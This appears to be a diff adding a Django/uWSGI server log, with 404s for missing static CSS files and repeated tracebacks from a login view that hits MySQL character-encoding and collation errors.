+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 2069|app: 0|req: 71/123] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 2069|app: 0|req: 72/124] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 2069|app: 0|req: 73/125] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 2069|app: 0|req: 74/126] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 2069|app: 0|req: 75/127] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:43:21 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 2069|app: 0|req: 76/128] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:43:22 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 2069|app: 0|req: 77/129] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:43:22 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 2069|app: 0|req: 78/130] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:43:22 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/131] 219.228.146.253 () {38 vars in 815 bytes} [Thu Jan 14 07:43:25 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 79/132] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:31 2021] POST /login/ => generated 209413 bytes in 100 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 80/133] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:40 2021] POST /login/ => generated 209413 bytes in 107 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 81/134] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:41 2021] POST /login/ => generated 183350 bytes in 89 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 82/135] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:43:47 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 83/136] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 124 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
